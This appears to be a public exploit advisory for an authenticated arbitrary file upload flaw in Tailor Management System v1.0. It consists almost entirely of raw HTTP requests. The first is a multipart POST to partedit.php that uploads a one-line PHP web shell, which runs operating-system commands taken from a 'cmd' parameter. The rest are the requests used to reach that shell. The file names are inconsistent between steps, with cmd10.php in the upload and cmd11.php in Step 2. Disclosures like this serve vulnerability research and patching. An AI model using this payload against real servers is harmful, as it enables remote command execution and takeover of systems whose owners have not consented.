Tailor Management System - Arbitrary File Upload (Authenticated)

# Exploit Title: Tailor Management System - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A



Step 1 - Request
POST /tailor/partedit.php?id=6 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------374227061277520034476021901

Content-Length: 943

DNT: 1

Connection: close

Referer: http://localhost/tailor/partedit.php?id=6

Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0

Upgrade-Insecure-Requests: 1


-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="type"

1

-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="title"

HIPS

-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="detail"



  Take out all of the stuff in the front and back pockets your trouser. The hip measurement should be taken around the hips at the widest point. Stand up in a relaxed posture, and keep the tape parallel. Do not tighten the tape measure. Make sure you can move the tape easily.

-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="bgimg"; filename="cmd10.php"

Content-Type: application/x-php


<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

-----------------------------374227061277520034476021901--


Step 2 - Response

GET /tailor/img/part/cmd11.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: image/webp,*/*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Referer: http://localhost/tailor/partedit.php?id=6

Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0


Step 3 - Read file uploaded

http://localhost/tailor/img/part/cmd10.php